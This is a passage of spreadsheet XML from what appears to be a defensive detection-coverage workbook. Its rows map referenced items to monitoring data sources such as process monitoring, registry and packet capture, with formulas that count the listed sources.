        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F99" s="6"/>
      <c r="G99" s="6"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A100" s="11" t="s">
        <v>160</v>
      </c>
      <c r="B100" s="6" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C100" s="12" t="s">
        <v>1277</v>
      </c>
      <c r="D100" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E100" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F100" s="6"/>
      <c r="G100" s="6"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A101" s="11" t="s">
        <v>161</v>
      </c>
      <c r="B101" s="6" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C101" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D101" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E101" s="6">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F101" s="6"/>
      <c r="G101" s="6"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A102" s="11" t="s">
        <v>162</v>
      </c>
      <c r="B102" s="6" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C102" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D102" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F102" s="6"/>
      <c r="G102" s="6"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A103" s="11" t="s">
        <v>163</v>
      </c>
      <c r="B103" s="6" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C103" s="12" t="s">
        <v>1278</v>
      </c>
      <c r="D103" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E103" s="6">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F103" s="6"/>
      <c r="G103" s="6"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A104" s="11" t="s">
        <v>164</v>
      </c>
      <c r="B104" s="6" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C104" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D104" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E104" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F104" s="6"/>
      <c r="G104" s="6"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A105" s="11" t="s">
        <v>165</v>
      </c>
      <c r="B105" s="6" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C105" s="12" t="s">
        <v>1279</v>
      </c>
      <c r="D105" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E105" s="6">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F105" s="6"/>
      <c r="G105" s="6"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A106" s="11" t="s">
        <v>166</v>
      </c>
      <c r="B106" s="6" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C106" s="12" t="s">
        <v>1280</v>
      </c>
      <c r="D106" s="6">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E106" s="6">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F106" s="6"/>
      <c r="G106" s="6"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A107" s="11" t="s">
        <v>167</v>
      </c>
      <c r="B107" s="6" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C107" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D107" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E107" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F107" s="6"/>
      <c r="G107" s="6"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A108" s="11" t="s">
        <v>168</v>
      </c>
      <c r="B108" s="6" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C108" s="12" t="s">
        <v>1281</v>
      </c>
      <c r="D108" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E108" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F108" s="6"/>
      <c r="G108" s="6"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A109" s="11" t="s">
        <v>169</v>
      </c>
      <c r="B109" s="6" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C109" s="12" t="s">
        <v>1282</v>
      </c>
      <c r="D109" s="6">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E109" s="6">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F109" s="6"/>
      <c r="G109" s="6"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A110" s="11" t="s">
        <v>170</v>
      </c>
      <c r="B110" s="6" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Disk forensics,API monitoring,Process monitoring,Component firmware</v>
      </c>
      <c r="C110" s="12" t="s">
        <v>1283</v>
      </c>
      <c r="D110" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E110" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F110" s="6"/>
      <c r="G110" s="6"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A111" s="11" t="s">
        <v>171</v>
      </c>
      <c r="B111" s="6" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C111" s="12">
        <v>100</v>
      </c>
      <c r="D111" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E111" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="6"/>
      <c r="G111" s="6"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A112" s="11" t="s">
        <v>172</v>
      </c>
      <c r="B112" s="6" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C112" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D112" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E112" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F112" s="6"/>
      <c r="G112" s="6"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A113" s="11" t="s">
        <v>173</v>
      </c>
      <c r="B113" s="6" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C113" s="12" t="s">
        <v>1284</v>
      </c>
      <c r="D113" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E113" s="6">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F113" s="6"/>
      <c r="G113" s="6"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A114" s="11" t="s">
        <v>174</v>
      </c>
      <c r="B114" s="6" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C114" s="12" t="s">
        <v>1285</v>
      </c>
      <c r="D114" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="6"/>
      <c r="G114" s="6"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A115" s="11" t="s">
        <v>175</v>
      </c>
      <c r="B115" s="6" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C115" s="12" t="s">
        <v>1286</v>
      </c>
      <c r="D115" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E115" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F115" s="6"/>
      <c r="G115" s="6"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A116" s="11" t="s">
        <v>176</v>
      </c>
      <c r="B116" s="6" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C116" s="12">
        <v>100</v>
      </c>
      <c r="D116" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="6"/>
      <c r="G116" s="6"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A117" s="11" t="s">
        <v>177</v>
      </c>
      <c r="B117" s="6" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C117" s="12">
        <v>100</v>
      </c>
      <c r="D117" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="6"/>
      <c r="G117" s="6"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A118" s="11" t="s">
        <v>178</v>
      </c>
      <c r="B118" s="6" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</v>
      </c>
      <c r="C118" s="12" t="s">
        <v>1238</v>
      </c>
      <c r="D118" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E118" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F118" s="6"/>
      <c r="G118" s="6"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A119" s="11" t="s">
        <v>179</v>
      </c>
      <c r="B119" s="6" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C119" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D119" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E119" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F119" s="6"/>
      <c r="G119" s="6"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A120" s="11" t="s">
        <v>180</v>
      </c>
      <c r="B120" s="6" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C120" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D120" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F120" s="6"/>
      <c r="G120" s="6"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A121" s="11" t="s">
        <v>181</v>
      </c>
      <c r="B121" s="6" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C121" s="12">
        <v>0</v>
      </c>
      <c r="D121" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E121" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="6"/>
      <c r="G121" s="6"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A122" s="11" t="s">
        <v>182</v>
      </c>
      <c r="B122" s="6" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C122" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D122" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E122" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F122" s="6"/>
      <c r="G122" s="6"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A123" s="11" t="s">
        <v>183</v>
      </c>
      <c r="B123" s="6" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,DLL monitoring,Loaded DLLs</v>
      </c>
      <c r="C123" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D123" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E123" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F123" s="6"/>
      <c r="G123" s="6"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A124" s="11" t="s">
        <v>184</v>
      </c>
      <c r="B124" s="6" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C124" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D124" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E124" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F124" s="6"/>
      <c r="G124" s="6"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A125" s="11" t="s">
        <v>185</v>
      </c>
      <c r="B125" s="6" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C125" s="12" t="s">
        <v>1263</v>
      </c>
      <c r="D125" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E125" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F125" s="6"/>
      <c r="G125" s="6"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A126" s="11" t="s">
        <v>186</v>
      </c>
      <c r="B126" s="6" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C126" s="12" t="s">
        <v>1258</v>
      </c>
      <c r="D126" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E126" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F126" s="6"/>
      <c r="G126" s="6"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A127" s="11" t="s">
        <v>187</v>
      </c>
      <c r="B127" s="6" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</v>
      </c>
      <c r="C127" s="12" t="s">
        <v>1288</v>
      </c>
      <c r="D127" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E127" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F127" s="6"/>
      <c r="G127" s="6"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A128" s="11" t="s">
        <v>188</v>
      </c>
      <c r="B128" s="6" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C128" s="12">
        <v>100</v>
      </c>
      <c r="D128" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E128" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="6"/>
      <c r="G128" s="6"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A129" s="11" t="s">
        <v>189</v>
      </c>
      <c r="B129" s="6" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C129" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D129" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E129" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="6"/>
      <c r="G129" s="6"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A130" s="11" t="s">
        <v>190</v>
      </c>
      <c r="B130" s="6" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C130" s="12" t="s">
        <v>1289</v>
      </c>
      <c r="D130" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E130" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F130" s="6"/>
      <c r="G130" s="6"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A131" s="11" t="s">
        <v>191</v>
      </c>
      <c r="B131" s="6" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Digital certificate logs</v>
      </c>
      <c r="C131" s="12" t="s">
        <v>1249</v>
      </c>
      <c r="D131" s="6">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>2</v>
      </c>
      <c r="E131" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F131" s="6"/>
      <c r="G131" s="6"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A132" s="11" t="s">
        <v>192</v>
      </c>
      <c r="B132" s="6" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C132" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D132" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E132" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F132" s="6"/>
      <c r="G132" s="6"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A133" s="11" t="s">
        <v>193</v>
      </c>
      <c r="B133" s="6" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C133" s="12" t="s">
        <v>1226</v>
      </c>
      <c r="D133" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F133" s="6"/>
      <c r="G133" s="6"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A134" s="11" t="s">
        <v>194</v>
      </c>
      <c r="B134" s="6" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C134" s="12">
        <v>100</v>
      </c>
      <c r="D134" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="6"/>
      <c r="G134" s="6"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A135" s="11" t="s">
        <v>195</v>
      </c>
      <c r="B135" s="6" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C135" s="12" t="s">
        <v>1248</v>
      </c>
      <c r="D135" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E135" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F135" s="6"/>
      <c r="G135" s="6"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A136" s="11" t="s">
        <v>196</v>
      </c>
      <c r="B136" s="6" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C136" s="12" t="s">
        <v>1283</v>
      </c>
      <c r="D136" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F136" s="6"/>
      <c r="G136" s="6"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A137" s="11" t="s">
        <v>197</v>
      </c>
      <c r="B137" s="6" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C137" s="12" t="s">
        <v>1290</v>
      </c>
      <c r="D137" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E137" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F137" s="6"/>
      <c r="G137" s="6"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A138" s="11" t="s">
        <v>198</v>
      </c>
      <c r="B138" s="6" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C138" s="12" t="s">
        <v>1250</v>
      </c>
      <c r="D138" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E138" s="6">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F138" s="6"/>
      <c r="G138" s="6"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A139" s="11" t="s">
        <v>199</v>
      </c>
      <c r="B139" s="6" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C139" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D139" s="6">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E139" s="6">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F139" s="6"/>
      <c r="G139" s="6"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A140" s="11" t="s">
        <v>200</v>
      </c>
      <c r="B140" s="6" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C140" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D140" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E140" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F140" s="6"/>
      <c r="G140" s="6"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A141" s="11" t="s">
        <v>201</v>
      </c>
      <c r="B141" s="6" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="12" t="s">
        <v>1291</v>
      </c>
      <c r="D141" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="6"/>
      <c r="G141" s="6"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A142" s="11" t="s">
        <v>202</v>
      </c>
      <c r="B142" s="6" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C142" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D142" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E142" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F142" s="6"/>
      <c r="G142" s="6"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A143" s="11" t="s">
        <v>203</v>
      </c>
      <c r="B143" s="6" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C143" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D143" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E143" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F143" s="6"/>
      <c r="G143" s="6"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A144" s="11" t="s">
        <v>204</v>
      </c>
      <c r="B144" s="6" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C144" s="12">
        <v>100</v>
      </c>
      <c r="D144" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E144" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="6"/>
      <c r="G144" s="6"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A145" s="11" t="s">
        <v>205</v>
      </c>
      <c r="B145" s="6" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C145" s="12">
        <v>0</v>
      </c>
      <c r="D145" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E145" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F145" s="6"/>
      <c r="G145" s="6"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A146" s="11" t="s">
        <v>206</v>
      </c>
      <c r="B146" s="6" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C146" s="12">
        <v>100</v>
      </c>
      <c r="D146" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E146" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="6"/>
      <c r="G146" s="6"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A147" s="11" t="s">
        <v>207</v>
      </c>
      <c r="B147" s="6" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C147" s="12" t="s">
        <v>1292</v>
      </c>
      <c r="D147" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E147" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="6"/>
      <c r="G147" s="6"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A148" s="11" t="s">
        <v>208</v>
      </c>
      <c r="B148" s="6" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C148" s="12" t="s">
        <v>1292</v>
      </c>
      <c r="D148" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E148" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F148" s="6"/>
      <c r="G148" s="6"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A149" s="11" t="s">
        <v>209</v>
      </c>
      <c r="B149" s="6" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Authentication logs,File monitoring,Environment variable</v>
      </c>
      <c r="C149" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D149" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E149" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F149" s="6"/>
      <c r="G149" s="6"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A150" s="11" t="s">
        <v>210</v>
      </c>
      <c r="B150" s="6" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
